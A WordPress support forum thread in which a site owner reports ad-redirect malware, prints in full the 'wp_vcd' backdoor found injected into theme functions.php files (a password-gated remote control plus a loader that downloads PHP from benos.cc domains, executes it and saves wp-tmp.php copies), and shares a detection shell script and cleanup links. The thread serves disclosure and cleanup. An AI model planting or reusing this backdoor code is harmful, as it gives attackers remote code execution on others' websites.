Support » Fixing WordPress » Ad Malware on our site but can’t remove!

Viewing 5 replies - 1 through 5 (of 5 total)
  • Andrew Nevins

    (@anevins)

    WCLDN 2018 Contributor | Volunteer support

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

    Hi, I have finally cracked down the malware! The sucuri.com malware scan report was:

    javascript malware. Details: http://labs.sucuri.net/db/malware/rogueads.unwanted_ads?1
    <script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1447995"></script>
    
    Javascript included from a blacklisted domain. Details: http://sucuri.net/malware/entry/MW:BLK:2
    Javascript: go.mobisla.com

    After some research and using Google I found that this is malware which uses the go.pub2srv[.]com, go.mobisla[.]com, go.oclaserver[.]com domains to redirect to their spammy ads.

    Thanks to the site https://www.getastra.com/blog/911/how-to-remove-pub2srv-malware-from-your-wordpress-opencart-website/ which elaborately identified the malware and has very clear suggestions to remove this malware.

    I found that the functions.php files of both my WordPress theme and child theme were modified. An unidentified plugin injected the following code at the beginning of the functions.php file:

    <?php
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f6efce15ddb7aa5764e90dffbfd5cfdc')) {
        $div_code_name = "wp_vcd";
        switch ($_REQUEST['action']) {
            case 'change_domain';
                if (isset($_REQUEST['newdomain'])) {
                    
                    if (!empty($_REQUEST['newdomain'])) {
                        if ($file = @file_get_contents(__FILE__)) {
                            if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code5\.php/i', $file, $matcholddomain)) {
                                
                                $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
                                @file_put_contents(__FILE__, $file);
                                print "true";
                            }
                        }
                    }
                }
                break;
            default:
                print "ERROR_WP_ACTION WP_V_CD WP_CD";
        }
        
        die("");
    }
    $div_code_name = "wp_vcd";
    $funcfile      = __FILE__;
    if (!function_exists('theme_temp_setup')) {
        $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
        if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
            
            function file_get_contents_tcurl($url)
            {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
                $data = curl_exec($ch);
                curl_close($ch);
                return $data;
            }
            
            function theme_temp_setup($phpCode)
            {
                $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
                fclose($handle);
                include $tmpfname;
                unlink($tmpfname);
                return get_defined_vars();
            }
            
            $wp_auth_key = 'd5b746bf6ce7930c9eb0496d5500a7ef';
            if (($tmpcontent = @file_get_contents("http://www.benos.cc/code5.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.benos.cc/code5.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
                
                if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }
                    
                }
            }
            elseif ($tmpcontent = @file_get_contents("http://www.benos.pw/code5.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
                
                if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }
                }
            } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                
            } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                
            } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                
            } elseif (($tmpcontent = @file_get_contents("http://www.benos.top/code5.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.benos.top/code5.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
            }
        }
    }
    //$start_wp_theme_tmp
    //wp_tmp
    //$end_wp_theme_tmp
    ?>

    After removing the code from both functions.php files, the malware is gone!

    Services that helped me to identify the malware:
    https://sitecheck.sucuri.net/
    https://wordpress.org/plugins/sucuri-scanner/
    http://sucuri.net/malware/entry/MW:BLK:2
    http://labs.sucuri.net/db/malware/rogueads.unwanted_ads?1

    Resources and thanks:
    https://www.getastra.com/blog/911/how-to-remove-pub2srv-malware-from-your-wordpress-opencart-website/
    https://toster.ru/q/482218
    https://pastebin.com/bzcCHnT3
    https://wordpress.org/support/topic/mwjsgen2rogueads-unwanted_ads-1-2/
    https://www.upwork.com/job/prevent-SQL-injection-PHP-hardening-wordpress-stop-website-hacks_~013dcf70c6f4637ad3/
    https://fixmywp.com/blog/detect-clean-wordpress-malware-redirect.php
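
The injected code quoted above does not live only in functions.php: it also saves the downloaded payload as wp-tmp.php under wp-includes, the theme directory, or the current directory, so those copies need checking too. The following POSIX shell scan is an added example, not part of the original post; the names scan_wp and make_demo_tree and the demo tree are constructed for illustration, and the match strings are taken from the quoted code.

```shell
#!/bin/sh
# Added example: look for what the injected stub quoted above leaves behind.
# Match strings come from that quoted code; the demo tree is constructed.

# Identifiers that appear in the injected functions.php code.
MARKERS='theme_temp_setup|file_get_contents_tcurl|wp_vcd|/code5\.php'

# scan_wp ROOT: print "TYPE<TAB>path" per finding; return 1 if anything found.
scan_wp() {
    root=$1
    hits=$(
        # 1. Theme functions.php files that contain the stub's identifiers.
        find "$root/wp-content/themes" -type f -name functions.php \
            -exec grep -El "$MARKERS" {} + 2>/dev/null |
            awk '{ print "INJECTED\t" $0 }'
        # 2. Payload copies the stub saves: wp-includes/wp-tmp.php, else the
        #    theme directory, else the current working directory.
        find "$root" -type f -name wp-tmp.php 2>/dev/null |
            awk '{ print "DROPPED\t" $0 }'
    )
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

# make_demo_tree DIR: constructed sample site (infected parent, clean child).
make_demo_tree() {
    mkdir -p "$1/wp-includes" "$1/wp-content/themes/parent" \
             "$1/wp-content/themes/child"
    printf '<?php\n$div_code_name = "wp_vcd";\nfunction theme_temp_setup($c) {}\n' \
        > "$1/wp-content/themes/parent/functions.php"
    printf '<?php\nadd_action("init", "my_theme_init");\n' \
        > "$1/wp-content/themes/child/functions.php"
    printf '<?php // constructed placeholder for a saved payload copy\n' \
        > "$1/wp-includes/wp-tmp.php"
}

# Usage: sh scan.sh /path/to/wordpress   (exit status 1 means findings)
if [ "$#" -gt 0 ]; then
    scan_wp "$1"
fi
```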

    Update:

    The code keeps reappearing again and again after deletion. What solved it for me is https://stackoverflow.com/questions/46219263/php-code-in-functions-php-of-all-wordpress-websites-on-my-shared-hosting

    Jaber, I have the same problem, it keeps reappearing..
    Did you find any permanent solution?

    Hi, thanks for the reply.
    I’ve done all that you wrote.
    But my website is broken now. /wp-include/taxonamy.php on line 530 .. problem (writing screen).
    What must I do now?

  • The topic ‘Ad Malware on our site but can’t remove!’ is closed to new replies.